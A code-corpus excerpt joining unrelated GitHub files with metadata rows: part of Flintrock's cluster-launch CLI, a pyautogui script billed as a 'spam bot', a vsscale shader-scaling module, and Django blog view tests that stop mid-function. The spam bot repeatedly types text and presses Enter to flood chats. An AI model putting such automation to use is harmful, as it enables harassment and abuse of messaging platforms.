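# e.g. normalize_keys({'launch': {'num-slaves': 2}}) -> {'launch': {'num_slaves': 2}}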
def config_to_click(config: dict) -> dict:
"""
Convert a dictionary of configurations loaded from a Flintrock config file
to a dictionary that Click can use to set default options.
"""
service_configs = {}
if 'services' in config:
for service in config['services']:
if config['services'][service]:
service_configs.update(
{service + '_' + k: v for (k, v) in config['services'][service].items()})
ec2_configs = {
'ec2_' + k: v for (k, v) in config['providers']['ec2'].items()}
click_map = {
'launch': dict(
list(config['launch'].items())
+ list(ec2_configs.items())
+ list(service_configs.items())),
'describe': ec2_configs,
'destroy': ec2_configs,
'login': ec2_configs,
'start': ec2_configs,
'stop': ec2_configs,
'add-slaves': ec2_configs,
'remove-slaves': ec2_configs,
'run-command': ec2_configs,
'copy-file': ec2_configs,
}
return click_map
@cli.command()
@click.option('--locate', is_flag=True, default=False,
help="Don't open an editor. "
"Just open the folder containing the configuration file.")
@click.pass_context
def configure(cli_context, locate):
"""
Configure Flintrock's defaults.
This will open Flintrock's configuration file in your default YAML editor so
you can set your defaults.
"""
config_file = get_config_file()
if not os.path.isfile(config_file):
logger.info("Initializing config file from template...")
os.makedirs(os.path.dirname(config_file), exist_ok=True)
shutil.copyfile(
src=os.path.join(THIS_DIR, 'config.yaml.template'),
dst=config_file)
os.chmod(config_file, mode=0o644)
ret = click.launch(config_file, locate=locate)
if ret != 0:
raise Error(
"Flintrock could not launch an application to {action} "
"the config file at '{location}'. You may want to manually "
"find and edit this file."
.format(
action="locate" if locate else "edit",
location=config_file
)
)
def flintrock_is_in_development_mode() -> bool:
"""
Check if Flintrock was installed in development mode.
Use this function to toggle behavior that only Flintrock developers should
see.
"""
# This esoteric technique was pulled from pip.
# See: https://github.com/pypa/pip/pull/3258/files#diff-ab583908279e865537dec218246edcfcR310
for path_item in sys.path:
egg_link = os.path.join(path_item, 'Flintrock.egg-link')
if os.path.isfile(egg_link):
return True
else:
return False
def set_open_files_limit(desired_limit):
"""
On POSIX systems, set the open files limit to the desired number, unless
it is already equal to or higher than that.
Setting a high limit enables Flintrock to launch or interact with really
large clusters.
Background discussion: https://github.com/nchammas/flintrock/issues/81
"""
soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft_limit < desired_limit:
if desired_limit > hard_limit:
warnings.warn(
"Flintrock cannot set the open files limit to {desired} "
"because the OS hard limit is {hard}. Going with {hard}. "
"You may have problems launching or interacting with "
"really large clusters."
.format(
desired=desired_limit,
hard=hard_limit),
category=RuntimeWarning,
stacklevel=2)
resource.setrlimit(
resource.RLIMIT_NOFILE,
(min(desired_limit, hard_limit), hard_limit))
def check_external_dependency(executable_name: str):
if shutil.which(executable_name) is None:
raise Error(
"Error: Flintrock could not find '{executable}' on your PATH. "
"Flintrock needs this executable to carry out the operation you "
"requested. Please install it and try again."
.format(
executable=executable_name
)
)
def main() -> int:
# Starting in Python 3.7, deprecation warnings are shown by default. We
# don't want to show these to end-users.
# See: https://docs.python.org/3/library/warnings.html#default-warning-filter
if not flintrock_is_in_development_mode():
warnings.simplefilter(action='ignore', category=DeprecationWarning)
set_open_files_limit(4096)
try:
try:
# We pass in obj so we can add attributes to it, like provider, which
# get shared by all commands.
# See: http://click.pocoo.org/6/api/#click.Context
cli(obj={})
except botocore.exceptions.NoCredentialsError:
raise Error(
"Flintrock could not find your AWS credentials. "
"You can fix this by providing your credentials "
"via environment variables or by creating a shared "
"credentials file.\n"
"For more information see:\n"
" * https://boto3.readthedocs.io/en/latest/guide/configuration.html#environment-variables\n"
" * https://boto3.readthedocs.io/en/latest/guide/configuration.html#shared-credentials-file"
)
except NothingToDo as e:
print(e)
return 0
except UsageError as e:
print(e, file=sys.stderr)
return 2
except Error as e:
print(e, file=sys.stderr)
return 1
| nchammas/flintrock | flintrock/flintrock.py | flintrock.py | py | 45,036 | python | en | code | 629 | github-code | 1 | [
{
"api_name": "sys._MEIPASS",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
... |
25515562168 | import pyautogui, time
print("A simple text spam bot that types a message and presses enter")
print("word mode = w, copy-and-paste mode = c, typed-text mode = t")
mode = input("Choose a mode (w/c/t): ")
def modet():
    text = input("Enter a text to spam: ")
    num = int(input("Enter a num: "))
    time.sleep(5)
    for _ in range(num):
        pyautogui.typewrite(text)
        pyautogui.press("enter")
def modec():
    num = int(input("Enter a num: "))
    time.sleep(5)
    with open("copy_and_paste.txt") as f:
        fa = f.read()
    for _ in range(num):
        pyautogui.typewrite(fa)
        pyautogui.press("enter")
def modep():
    time.sleep(5)
    with open("word.txt") as f:
        for word in f:
            pyautogui.typewrite(word)
            pyautogui.press("enter")
if mode == "c":
    modec()
elif mode == "w":
    modep()
elif mode == "t":
    modet()
else:
    print("Only type w, c or t")
| Kn0spi/Spam_Bot | spam_bot.py | spam_bot.py | py | 1,084 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "time.sleep",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pyautogui.typewrite",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pyautogui.press",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_... |
5059822920 | from __future__ import annotations
from dataclasses import dataclass, field
from math import ceil
from pathlib import Path
from typing import TYPE_CHECKING, Any, overload
from vstools import (
MISSING, CustomRuntimeError, FileWasNotFoundError, MissingT, core, expect_bits, get_user_data_dir, get_video_format,
inject_self, join, vs
)
from .base import ShaderFileBase, ShaderFileCustom
from .helpers import GenericScaler
__all__ = [
'PlaceboShader',
'ShaderFile',
'FSRCNNXShader', 'FSRCNNXShaderT'
]
class PlaceboShaderMeta(GenericScaler):
shader_file: str | Path | ShaderFile
@dataclass
class PlaceboShaderBase(PlaceboShaderMeta):
"""Base placebo shader class."""
chroma_loc: int | None = field(default=None, kw_only=True)
matrix: int | None = field(default=None, kw_only=True)
trc: int | None = field(default=None, kw_only=True)
linearize: int | None = field(default=None, kw_only=True)
sigmoidize: int | None = field(default=None, kw_only=True)
sigmoid_center: float | None = field(default=None, kw_only=True)
sigmoid_slope: float | None = field(default=None, kw_only=True)
lut_entries: int | None = field(default=None, kw_only=True)
antiring: float | None = field(default=None, kw_only=True)
filter_shader: str | None = field(default=None, kw_only=True)
clamp: float | None = field(default=None, kw_only=True)
blur: float | None = field(default=None, kw_only=True)
taper: float | None = field(default=None, kw_only=True)
radius: float | None = field(default=None, kw_only=True)
param1: float | None = field(default=None, kw_only=True)
param2: float | None = field(default=None, kw_only=True)
def __post_init__(self) -> None:
super().__post_init__()
if not hasattr(self, 'shader_file'):
raise CustomRuntimeError('You must specify a "shader_file"!', self.__class__)
@inject_self
def scale( # type: ignore
self, clip: vs.VideoNode, width: int, height: int, shift: tuple[float, float] = (0, 0), **kwargs: Any
) -> vs.VideoNode:
output, _ = expect_bits(clip, 16)
fmt = get_video_format(output)
if fmt.num_planes == 1:
if width > output.width or height > output.height:
output = output.resize.Point(format=vs.YUV444P16)
else:
for div in (4, 2):
if width % div == 0 and height % div == 0:
blank = core.std.BlankClip(output, output.width // div, output.height // div, vs.GRAY16)
break
else:
blank = output.std.BlankClip(vs.GRAY16)
output = join(output, blank, blank)
kwargs |= {
'shader': str(
self.shader_file()
if isinstance(self.shader_file, ShaderFile) else
ShaderFile.CUSTOM(self.shader_file)
),
'chroma_loc': self.chroma_loc, 'matrix': self.matrix,
'trc': self.trc, 'linearize': self.linearize,
'sigmoidize': self.sigmoidize, 'sigmoid_center': self.sigmoid_center, 'sigmoid_slope': self.sigmoid_slope,
'lut_entries': self.lut_entries,
'antiring': self.antiring, 'filter': self.filter_shader, 'clamp': self.clamp,
'blur': self.blur, 'taper': self.taper, 'radius': self.radius,
'param1': self.param1, 'param2': self.param2,
} | kwargs | {
'width': output.width * ceil(width / output.width),
'height': output.height * ceil(height / output.height)
}
if not kwargs['filter']:
kwargs['filter'] = 'box' if fmt.num_planes == 1 else 'ewa_lanczos'
if not Path(kwargs['shader']).exists():
try:
kwargs['shader'] = str(ShaderFile.CUSTOM(kwargs['shader']))
except FileWasNotFoundError:
...
output = output.placebo.Shader(**kwargs)
return self._finish_scale(output, clip, width, height, shift)
@dataclass
class PlaceboShader(PlaceboShaderBase):
shader_file: str | Path
class ShaderFile(ShaderFileBase):
"""Default shader files shipped with vsscale."""
if not TYPE_CHECKING:
CUSTOM = 'custom'
FSRCNNX_x8 = 'FSRCNNX_x2_8-0-4-1.glsl'
FSRCNNX_x16 = 'FSRCNNX_x2_16-0-4-1.glsl'
FSRCNNX_x56 = 'FSRCNNX_x2_56-16-4-1.glsl'
SSIM_DOWNSCALER = 'SSimDownscaler.glsl'
SSIM_SUPERSAMPLER = 'SSimSuperRes.glsl'
@overload
def __call__(self) -> Path:
...
@overload
def __call__(self: ShaderFileCustom, file_name: str | Path) -> Path: # type: ignore
...
def __call__(self, file_name: str | Path | MissingT = MISSING) -> Path:
"""Get a path from the shader member, name or path."""
if self is not ShaderFile.CUSTOM:
return Path(__file__).parent / 'shaders' / self.value
if file_name is MISSING: # type: ignore
raise TypeError("ShaderFile.__call__() missing 1 required positional argument: 'file_name'")
file_name, cwd = Path(file_name), Path.cwd()
assets_dirs = [
file_name,
cwd / file_name,
cwd / '.shaders' / file_name,
cwd / '_shaders' / file_name,
cwd / '.assets' / file_name,
cwd / '_assets' / file_name
]
for asset_dir in assets_dirs:
if asset_dir.is_file():
return asset_dir
mpv_dir = get_user_data_dir().parent / 'Roaming' / 'mpv' / 'shaders' / file_name
if mpv_dir.is_file():
return mpv_dir
raise FileWasNotFoundError(f'"{file_name}" could not be found!', str(ShaderFile.CUSTOM))
class FSRCNNXShader(PlaceboShaderBase):
"""Defaults FSRCNNX shaders shipped with vsscale."""
shader_file = ShaderFile.FSRCNNX_x56
@dataclass
class x8(PlaceboShaderBase):
shader_file = ShaderFile.FSRCNNX_x8
@dataclass
class x16(PlaceboShaderBase):
shader_file = ShaderFile.FSRCNNX_x16
@dataclass
class x56(PlaceboShaderBase):
shader_file = ShaderFile.FSRCNNX_x56
FSRCNNXShaderT = type[PlaceboShaderBase] | PlaceboShaderBase # type: ignore
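# Illustrative usage (a sketch; assumes vstools' inject_self lets scale() be called
# on the class itself): FSRCNNXShader.x56.scale(clip, clip.width * 2, clip.height * 2)
# doubles a clip with the bundled FSRCNNX 56-16-4-1 shader.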
| jiaolovekt/HPCENC | deps/vs-plugins/vsscale/shaders.py | shaders.py | py | 6,240 | python | en | code | 11 | github-code | 1 | [
{
"api_name": "helpers.GenericScaler",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "dataclasses.field",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "dataclasses.fiel... |
35385777411 | import json
from functools import wraps
from datetime import datetime, timedelta
from flask import Flask, jsonify, request, make_response
from SQLalchemy import Autor, Postagem, db
import jwt
app = Flask(__name__)
app.config['SECRET_KEY'] = 'GLAUBER@2907'  # JWT signing key
# postagens = [
#     {
#         'título': 'Minha História',
#         'autor': 'Amanda Dias'
#     },
#     {
#         'título': 'Novo Dispositivo Sony',
#         'autor': 'Howard Stringer'
#     },
#     {
#         'título': 'Lançamento do Ano',
#         'autor': 'Jeff Bezos'
#     },
# ]
# # Default route - GET https://localhost:5000
# @app.route('/')
# def obter_postagens():
#     return jsonify(postagens)
# # Get a post by index - GET https://localhost:5000/postagem/1
# @app.route('/postagem/<int:indice>', methods=['GET'])
# def obter_postagem_por_indice(indice):
#     return jsonify(postagens[indice])
# # Create a new post - POST https://localhost:5000/postagem
# @app.route('/postagem', methods=['POST'])
# def nova_postagem():
#     postagem = request.get_json()
#     postagens.append(postagem)
#     return jsonify(postagem, 200)
# # Update an existing post - PUT https://localhost:5000/postagem/1
# @app.route('/postagem/<int:indice>', methods=['PUT'])
# def alterar_postagem(indice):
#     postagem_alterada = request.get_json()
#     postagens[indice].update(postagem_alterada)
#     return jsonify(postagens[indice], 200)
# # Delete a post - DELETE - https://localhost:5000/postagem/1
# # def excluir_postagem(indice):
#     try:
#         if postagens[indice] is not None:
#             del postagens[indice]
#             return jsonify(f'Post {postagens[indice]} was deleted', 200)
#     except:
#         return jsonify('Could not find the post to delete', 404)
# BUILDING THE API ON TOP OF A DATABASE STRUCTURE
# POSTMAN & DBBROWSER
# Decorator that makes a valid token mandatory on a route
def token_obrigatorio(f):
    @wraps(f)
    def decorated(*args, **kwargs):
        token = None
        # check whether a token was sent with the request
        if 'x-access-token' in request.headers:
            token = request.headers['x-access-token']
        if not token:
            return jsonify({'mensagem': 'Token not found'}, 401)
        # if so, look the author up in the database
        try:
            resultado = jwt.decode(token, app.config['SECRET_KEY'], algorithms=['HS256'])
            autor = Autor.query.filter_by(id_autor=resultado['id_autor']).first()
        except Exception:
            return jsonify({'mensagem': 'Token is invalid'}, 401)
        return f(autor, *args, **kwargs)
    return decorated
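# Usage sketch (an assumption; the routes below keep the decorator commented out):
# stacking @token_obrigatorio under @app.route(...) makes the wrapped view receive
# the authenticated Autor as its first positional argument, so guarded views must
# declare it, e.g. def obter_autores(autor): ...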
# Login route - http://localhost:5000/login
@app.route('/login')
def login():
    auth = request.authorization
    if not auth or not auth.username or not auth.password:
        return make_response('Invalid login', 401, {'WWW-Authenticate': 'Basic realm="Login required"'})
    usuario = Autor.query.filter_by(nome=auth.username).first()
    if not usuario:
        return make_response('Invalid login', 401, {'WWW-Authenticate': 'Basic realm="Login required"'})
    if auth.password == usuario.senha:
        token = jwt.encode(
            {'id_autor': usuario.id_autor, 'exp': datetime.utcnow() + timedelta(minutes=30)},
            app.config['SECRET_KEY'])
        return jsonify({'token': token})
    return make_response('Invalid login', 401, {'WWW-Authenticate': 'Basic realm="Login required"'})
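# Illustrative call (hypothetical credentials): HTTP Basic auth against /login
# returns a 30-minute JWT, e.g. curl -u amanda:1234 http://localhost:5000/login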
# List all authors - GET
@app.route('/autores')
# @token_obrigatorio
def obter_autores():
    autores = Autor.query.all()
    lista_de_autores = []
    for autor in autores:
        autor_atual = {}
        autor_atual['id_autor'] = autor.id_autor
        autor_atual['nome'] = autor.nome
        autor_atual['email'] = autor.email
        lista_de_autores.append(autor_atual)
    return jsonify({'autores': lista_de_autores})
# Get one author by id - GET
@app.route('/autores/<int:id_autor>', methods=['GET'])
# @token_obrigatorio
def obter_autor_por_id(id_autor):
    autor = Autor.query.filter_by(id_autor=id_autor).first()
    if not autor:
        return jsonify('Author not found')
    autor_atual = {}
    autor_atual['id_autor'] = autor.id_autor
    autor_atual['nome'] = autor.nome
    autor_atual['email'] = autor.email
    return jsonify({'autor': autor_atual})
# Create a new author - POST
@app.route('/autores', methods=['POST'])
# @token_obrigatorio
def novo_autor():
    novo_autor = request.get_json()
    autor = Autor(
        nome=novo_autor['nome'], senha=novo_autor['senha'], email=novo_autor['email'])
    db.session.add(autor)
    db.session.commit()
    return jsonify({'mensagem': 'User created successfully'}, 200)
@app.route('/autores/<int:id_autor>', methods=['PUT'])
# @token_obrigatorio
def alterar_autor(id_autor):
    usuario_a_alterar = request.get_json()
    autor = Autor.query.filter_by(id_autor=id_autor).first()
    if not autor:
        return jsonify({'Mensagem': 'This user was not found'})
    try:
        if usuario_a_alterar['nome']:
            autor.nome = usuario_a_alterar['nome']
    except KeyError:
        pass
    try:
        if usuario_a_alterar['email']:
            autor.email = usuario_a_alterar['email']
    except KeyError:
        pass
    try:
        if usuario_a_alterar['senha']:
            autor.senha = usuario_a_alterar['senha']
    except KeyError:
        pass
    db.session.commit()
    return jsonify({'Mensagem': 'User updated successfully!'})
@app.route('/autores/<int:id_autor>', methods=['DELETE'])
def excluir_autor(id_autor):
    autor_existente = Autor.query.filter_by(id_autor=id_autor).first()
    if not autor_existente:
        return jsonify({'Mensagem': 'This author does not exist'})
    db.session.delete(autor_existente)
    db.session.commit()
    return jsonify({'Mensagem': 'Author deleted successfully!'})
# Building out the endpoints for Postagem (posts)
@app.route('/postagens')  # GET for posts
def obterpostagens():
    postagens = Postagem.query.all()
    lista_de_postagens = []
    for postagem in postagens:
        postagem_atual = {}
        postagem_atual['id_postagem'] = postagem.id_postagem
        postagem_atual['titulo'] = postagem.titulo
        postagem_atual['id_autor'] = postagem.id_autor
        lista_de_postagens.append(postagem_atual)
    return jsonify({'postagens': lista_de_postagens})
# GET with id - fetch a single post
@app.route('/postagens/<int:id_postagem>', methods=['GET'])
def obterpostagem_id(id_postagem):
    postagem1 = Postagem.query.filter_by(id_postagem=id_postagem).first()
    if not postagem1:
        return jsonify('Post not found')
    postagem_atual = {}
    postagem_atual['id_postagem'] = postagem1.id_postagem
    postagem_atual['titulo'] = postagem1.titulo
    postagem_atual['id_autor'] = postagem1.id_autor
    return jsonify(f'You looked up post {postagem_atual}')
# POST - create a new post
@app.route('/postagens', methods=['POST'])
def novapostagem():
    nova_postagem = request.get_json()
    postagem = Postagem(titulo=nova_postagem['titulo'])
    db.session.add(postagem)
    db.session.commit()
    return jsonify({'mensagem': 'Post created successfully'}, 200)
# PUT - update an existing post
@app.route('/postagens/<int:id_postagem>', methods=['PUT'])
def alterarpostagem(id_postagem):
    postagem_a_alter = request.get_json()
    postagem = Postagem.query.filter_by(id_postagem=id_postagem).first()
    if not postagem:
        return jsonify({'Mensagem': 'This post does not exist'})
    postagem.titulo = postagem_a_alter['titulo']
    db.session.commit()
    return jsonify({'Mensagem': 'Post updated successfully!'})
# DELETE for posts
@app.route('/postagens/<int:id_postagem>', methods=['DELETE'])
def deletarpostagem(id_postagem):
    postagem_existente = Postagem.query.filter_by(id_postagem=id_postagem).first()
    if not postagem_existente:
        return jsonify({'mensagem': 'Post not found'})
    db.session.delete(postagem_existente)
    db.session.commit()
    return jsonify({'mensagem': 'Post deleted successfully!'})
if __name__ == '__main__':
    app.run(port=5000, host='localhost', debug=True) | Glauberorionslt/apiblog-devaprender | app.py | app.py | py | 8,266 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "lib2to3.pgen2.token",
"line_number": 80,
"usage_type": "name"
},
{
"api_name": "flask.request.headers",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "flask.requ... |
21619963342 | import threading
import time
import urllib
from collections import deque
import discord
import cogs.voice_lib.mkvparse as mkvparse
import logging
# dumb buffer stuff
import io, queue, subprocess
class Handler(mkvparse.MatroskaHandler):
def __init__(self, packet_buffer):
self.packet_buffer = packet_buffer
# dispatched for each frame by mkvparse
def frame(self, track_id, timestamp, data, more_laced_frames, duration, keyframe, invisible, discardable):
while len(self.packet_buffer) > 10000:
time.sleep(1) # block until packet buffer size is reduced
self.packet_buffer.append(data)
class Buffer:
def __init__(self, raw_packets):
self.raw_packets = raw_packets
self.packets = deque()
self.handler = Handler(self.packets)
self.parser = None
def parse_opus(self):
self.parser = threading.Thread(target=mkvparse.mkvparse, args=(self, self.handler))
self.parser.daemon = True
self.parser.start()
def wait_until_ready(self):
while len(self.packets) < 25 and self.parser.is_alive():
time.sleep(0.1)
def read(self, n):
# Called by mkvparse
try:
return self.raw_packets.read(n)
except ConnectionError as e:
raise e
# this is a little over-engineered -- we only call self.read() with a fixed value
# so a lot about this could be simplified if it turns out to be a performance problem
class StreamBuffer(io.BufferedIOBase):
def __init__(self, file, *args, **kwargs):
super(StreamBuffer, self).__init__(*args, **kwargs)
self.CHUNK_SIZE = 1024 * 16
self.MAX_QUEUE_SIZE = 160 * 4 # 10 MiB max per buffer
self.file = file
self.finished_downloading = False
self.current_buffer = io.BytesIO()
self.buffers = queue.Queue(self.MAX_QUEUE_SIZE)
self.downloader = threading.Thread(target=self.top_up_buffers, args=())
self.downloader.daemon = True
self.downloader.start()
def read(self, size=-1):
if size is None or size < 0:
size = float('inf')
total = 0
data = []
size_remaining = size if isinstance(size, int) else -1
while total < size:
x = self.current_buffer.read(size_remaining)
total += len(x)
size_remaining -= len(x)
data.append(x)
if len(x) == 0:
while True:
try:
self.current_buffer = self.buffers.get(timeout=0.2)
break
except queue.Empty:
if self.finished_downloading:
return b''.join(data)
return b''.join(data)
def top_up_buffers(self):
while not self.finished_downloading:
data = self.file.read(self.CHUNK_SIZE)
if data == b'':
self.finished_downloading = True
break
self.buffers.put(io.BytesIO(data))
logging.info("finished downloading")
def fileno(self) -> int:
raise OSError()
def register_sink(self, stdin):
self.sink = threading.Thread(target=self._register_sink, args=(stdin,))
self.sink.daemon = True
self.sink.start()
def _register_sink(self, stdin):
while True:
data = self.read(self.CHUNK_SIZE)
if data == b'':
logging.info("Finished playing song")
stdin.close()
break
stdin.write(data)
class Source(discord.AudioSource):
def __init__(self, file, song=None, buffer=Buffer):
self.buffer = buffer(file)
self.buffer.parse_opus()
self.song = song
def read(self):
self.buffer.wait_until_ready()
try:
frame = self.buffer.packets.popleft()
except IndexError:
frame = b''
return frame
def is_opus(self):
return True
def get_source(song, use_opus=True):
song.refresh_info()
if song.codec != 'opus' or not use_opus:
buf = StreamBuffer(urllib.request.urlopen(song.media_url))
# wait until buffer is non-empty (takes about a second)
# if we don't do this, discord glitches and the first few seconds are sped up
while buf.buffers.empty() and not buf.finished_downloading:
time.sleep(0.1)
source = discord.FFmpegPCMAudio(subprocess.PIPE, pipe=True)
buf.register_sink(source._process.stdin)
else:
file = urllib.request.urlopen(song.media_url)
source = Source(file, song)
return source
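# Illustrative use (assumed caller): voice_client.play(get_source(song)).
# When the stream is Opus-in-MKV/WebM, Source hands parsed packets straight to
# Discord with no re-encoding; otherwise the download is piped through FFmpegPCMAudio.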
| biglizards/butty | cogs/voice_lib/parser.py | parser.py | py | 4,677 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "cogs.voice_lib.mkvparse.MatroskaHandler",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "cogs.voice_lib.mkvparse",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 23,
"usage_type": "call"
},
{
"a... |
29673261055 | # -*- coding: utf-8 -*-
"""Server for the Raspi Webapp
Examples:
    - get json with curl -> curl -X POST http://0.0.0.0:2828/api/v1/getCrashInfo -d @data/1.json
    - get image with curl -> curl -X POST http://0.0.0.0:2828/api/v1/getCrashImage -d @data/1.json -o received_img.png
"""
import sys
sys.path.append('..')
import os
import signal
import time
from sanic import Sanic
from sanic.response import json
from sanic.response import file
import helper.log_helper as logger
import config
from damage_image import DamageImage
from data_parser import DataParser
app = Sanic()
app.name = "CrashSimulationAsimov"
log = logger.get(False, "Server")
# SIGINT handler (when pressing Ctrl+C)
def signal_int_handler(sig, frame):
print("Ctrl+C Pressed. Exit...")
sys.exit(0)
# Routes
# GET - index.html
@app.route('/', methods=['GET'],)
async def index(request):
return await file(os.path.join(os.path.dirname(__file__), 'frontend/index.html'))
# GET - favicon.ico
@app.route('/favicon.ico', methods=['GET'],)
async def favicon(request):
return await file(os.path.join(os.path.dirname(__file__), 'frontend/favicon.ico'))
# POST request 1 - returns JSON {"impactAngle": degrees, "offsetMaximumForce": millisecond}
@app.route('/api/v1/getCrashInfo', methods=['POST',])
async def crash_info(request):
''' crash info parses the crash record and returns a JSON object '''
log.info("Handling '/api/v1/getCrashInfo'")
angle, max_force_offset, _, _, _ = DataParser().parse_input_data(request.body.decode('utf8'))
return json({'impactAngle': angle, 'offsetMaximumForce': max_force_offset})
# POST request 2 - returns a rendered crash image (PNG)
@app.route('/api/v1/getCrashImage', methods=['POST',])
async def crash_image(request):
''' crash image parses the crash record and returns a Image '''
log.info("Handling '/api/v1/getCrashImage'")
customOffset = 0
try:
customOffset = int(request.args.get('timeOffsetMS'))
except Exception as e:
log.error(e)
log.info("Set customOffset: " + str(customOffset) + "ms")
angle_impact, max_force, damage_id, crash_time, max_force_offset = DataParser().parse_input_data(request.body.decode('utf8'), custom_offset=customOffset)
d = DamageImage(angle_impact, max_force, damage_id, crash_time, max_force_offset)
return await file(d.get_image())
# POST request 3 - returns a rendered crash image list (PNG)
@app.route('/api/v1/play', methods=['POST',])
async def image_list(request):
''' crash image parses the crash record and returns a Image List '''
log.info("Handling '/api/v1/play'")
images = []
data = request.body.decode('utf-8')
for i in range(-8000, 8000, 1000):
angle_impact, max_force, damage_id, crash_time, max_force_offset = DataParser().parse_input_data(data, custom_offset=i)
d = DamageImage(angle_impact, max_force, damage_id, crash_time, max_force_offset)
images.append(d.get_image())
return json({"data": images})
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_int_handler)
##app.add_task(task(app))
app.static('/frontend', './frontend')
app.static('/images', './images')
app.run(host=config.host, port=config.port, debug=False, access_log=False)
| tschibu/starthack-asimov | src/server.py | server.py | py | 3,244 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sanic.Sanic",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "helper.log_helper.get",
"... |
72860061154 | from bs4 import BeautifulSoup
from django.test import TestCase, Client
from django.contrib.auth.models import User
from .models import Post, Category, Tag
# <6. Test-Driven Development>
# Install beautifulsoup4 with `pip install beautifulsoup4` before use
# 1. `python manage.py test` is the command that runs the tests
# 2. In blog/test.py, define a class that inherits TestCase and whose name starts with 'Test' (TestView)
# 3. In TestView, define functions whose names start with 'test' (test_post_list, test_post_detail)
class TestView(TestCase):
    # Shared setup that runs before every test
    def setUp(self):
        self.client = Client() # the Client class lets tests run against the view matched to each real URL path
self.user_james = User.objects.create_user(username='James', password='somepassword')
self.user_trump = User.objects.create_user(username='Trump', password='somepassword')
self.category_programming = Category.objects.create(name='programming', slug='programming')
self.category_culture = Category.objects.create(name='culture', slug='culture')
self.tag_python_kor = Tag.objects.create(name='파이썬 공부', slug='파이썬-공부')
self.tag_python = Tag.objects.create(name='python', slug='python')
self.tag_hello = Tag.objects.create(name='hello', slug='hello')
        # 3.1. When three posts exist
self.post_001 = Post.objects.create(
title='첫 번째 포스트 입니다.',
content='Hello world. We are the world',
author=self.user_james,
category=self.category_programming,
)
self.post_001.tags.add(self.tag_hello)
self.post_002 = Post.objects.create(
title='두 번째 포스트 입니다.',
content='1등이 전부가 아니잖아요',
author=self.user_trump,
category=self.category_culture,
)
self.post_003 = Post.objects.create(
title='세 번째 포스트 입니다.',
content='세번째 포스트 입니다.',
author=self.user_trump,
)
self.post_003.tags.add(self.tag_python)
self.post_003.tags.add(self.tag_python_kor)
def navbar_test(self, soup):
        # 1.4. There is a navigation bar.
        navbar = soup.nav
        # 1.5. The navigation bar contains the phrases 'Blog' and 'About Me'.
        self.assertIn('Blog', navbar.text) # assertIn, because the text is contained in the navbar rather than equal to it
self.assertIn('About Me', navbar.text)
logo = navbar.find('a', text='Internet Programming')
self.assertEqual(logo.attrs['href'], '/')
logo = navbar.find('a', text='Home')
self.assertEqual(logo.attrs['href'], '/')
logo = navbar.find('a', text='Blog')
self.assertEqual(logo.attrs['href'], '/blog/')
logo = navbar.find('a', text='About Me')
self.assertEqual(logo.attrs['href'], '/about_me/')
def category_test(self, soup):
category = soup.find('div', id='categories-card')
self.assertIn('Categories', category.text)
self.assertIn(f'{self.category_programming.name} ({self.category_programming.post_set.count()})', category.text)
self.assertIn(f'{self.category_culture.name} ({self.category_culture.post_set.count()})', category.text)
        self.assertIn('미분류 (1)', category.text)  # '미분류' means "Uncategorized"
def test_category_page(self):
        # Load the category page via its URL
        response = self.client.get(self.category_programming.get_absolute_url())
        self.assertEqual(response.status_code, 200)
        # Parse the HTML with beautifulsoup4
soup = BeautifulSoup(response.content, 'html.parser')
self.navbar_test(soup)
self.category_test(soup)
        # Check that the category name is present
        self.assertIn(self.category_programming.name, soup.h1.text)
        # Check that only posts belonging to the category are shown
main_area = soup.find('div', id='main-area')
self.assertIn(self.category_programming.name, main_area.text)
self.assertIn(self.post_001.title, main_area.text)
self.assertNotIn(self.post_002.title, main_area.text)
self.assertNotIn(self.post_003.title, main_area.text)
def test_tag_page(self):
        # Load the tag page via its URL
        response = self.client.get(self.tag_hello.get_absolute_url())
        self.assertEqual(response.status_code, 200)
        # Parse the HTML with beautifulsoup4
soup = BeautifulSoup(response.content, 'html.parser')
self.navbar_test(soup)
self.category_test(soup)
        # Check that the tag name is present
        self.assertIn(self.tag_hello.name, soup.h1.text)
        # Check that only posts carrying the tag are shown
main_area = soup.find('div', id='main-area')
self.assertIn(self.tag_hello.name, main_area.text)
self.assertIn(self.post_001.title, main_area.text)
self.assertNotIn(self.post_002.title, main_area.text)
self.assertNotIn(self.post_003.title, main_area.text)
def test_create_post(self):
        # 1.1. Request the post-creation page.
response = self.client.get('/blog/create_post/')
self.assertNotEqual(response.status_code, 200)
self.client.login(username='Trump', password='somepassword')
        response = self.client.get('/blog/create_post/') # holds the response for the requested page; 200 means it worked
        # 1.2. The page loads normally.
        self.assertEqual(response.status_code, 200) # the HTTP status code of the response.
        # 1.3. The page title is 'Create Post - Blog'.
        soup = BeautifulSoup(response.content, 'html.parser') # BeautifulSoup analyzes the page; the parser does the actual work
self.assertEqual(soup.title.text, 'Create Post - Blog')
main_area = soup.find('div', id="main-area")
self.assertIn('Create new Post', main_area.text)
self.client.post('/blog/create_post/',
{
'title': "Post form 만들기",
'content': "Post form 페이지 만들기",
})
last_post = Post.objects.last()
self.assertEqual(last_post.title, "Post form 만들기")
self.assertEqual(last_post.author.username, 'Trump')
    # Test code for the post list page
    def test_post_list(self):
        # 1.1. Fetch the post list page.
        response = self.client.get('/blog/') # holds the response for the requested list page; 200 means it worked
        # 1.2. The page loads normally.
